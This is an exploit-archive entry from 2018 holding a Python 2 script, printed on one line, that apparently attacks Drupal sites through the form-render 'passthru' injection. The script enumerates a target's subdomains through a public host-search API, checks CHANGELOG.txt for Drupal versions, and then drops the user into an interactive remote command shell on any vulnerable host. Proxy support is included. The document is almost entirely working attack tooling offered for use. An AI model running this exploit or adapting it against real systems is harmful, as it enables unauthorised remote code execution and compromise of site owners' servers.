Drupal exploiter with subdomain brute-forcing (RCE)

2018.05.22
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python import requests,time,sys,re # Authors: # - batinihani ~ https://github.com/batininhani/ # - alpereneymen ~ https://github.com/alpereneymen/ class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def exploit(HOST,cmq): global r get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru', 'name[#markup]': "'"+cmq+"'",'name[#type]': 'markup'} post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'} r = requests.post(HOST, data=post_params, params=get_params) m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text) if m: found = m.group(1) get_params = {'q': 'file/ajax/name/#value/' + found} post_params = {'form_build_id': found} r = requests.post(HOST, data=post_params, params=get_params) def get_version(url): try: response = requests.get(url, timeout=2, headers={ 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'}) contents = response.text if "Drupal" in contents: splitted = contents.split() print " {} [+] {} Version : {} {}\n".format(bcolors.OKGREEN,url,splitted[1].replace(",",""),bcolors.ENDC) okno = raw_input("Do you want try exploit ? [Y/n] -> ") if okno == "Y" or okno == "y": while True: http_https = raw_input(bcolors.OKGREEN + "HTTP / HTTPS ? -> " + bcolors.ENDC) if http_https == "http" or http_https == "HTTP": http_https = "http://" break elif http_https == "https" or http_https == "HTTPS": http_https = "https://" break else: continue www_ask = raw_input(bcolors.OKGREEN+"If it's not subdomain put 'www' -> "+bcolors.ENDC) if www_ask == "www": www_ask = "www" else: www_ask = "" HOST = http_https + www_ask + host + "/" echo = "'echo w00t!'" exploit(HOST, echo) if r.text.splitlines()[0] == "w00t!": print("\n"+bcolors.OKGREEN+"YOU GOT A SHELL!! 
"+bcolors.ENDC+"\n") time.sleep(2.0) while True: cmq = raw_input('\033[1;31mshell > \033[1;m') if cmq == "quit" or cmq == "q": break else: cmq = "'%s'" %cmq exploit(HOST, cmq) print r.text[(r.text.index("")+len("")):r.text.index("[{")] else: print "[i]Not Exploitable!\n" pass except requests.exceptions.InvalidURL: print "\n[i] Done!" except (requests.ConnectionError,requests.ReadTimeout,requests.TooManyRedirects): time.sleep(0.1) target = raw_input(bcolors.OKGREEN + "Target :" + bcolors.ENDC) yn = raw_input(bcolors.WARNING + "Do you want use proxy ?" + bcolors.BOLD + "[Y/N] :" + bcolors.ENDC) if yn == "Y" or yn =="y": p_ip = raw_input(bcolors.OKGREEN + "IP :" + bcolors.ENDC) p_port = raw_input(bcolors.OKGREEN + "PORT :" + bcolors.ENDC) p_full = p_ip + ":" + p_port else: p_full = "" # Change Proxy http_proxy = p_full proxyDict = {"http": http_proxy} hostsearch = "http://api.hackertarget.com/hostsearch/?q=" + target response = requests.get(hostsearch, headers={ 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'}, proxies=proxyDict) hosts_ips = response.text if "error check your search parameter" in hosts_ips: sys.exit("Change Proxy!") else: content = hosts_ips.split("\n") result = [] for line in content: result.append(line.split(',')[0]) for host in result: print ("[i]" + host + "-> CHECKING..") get_version("http://" + host + "/CHANGELOG.txt")

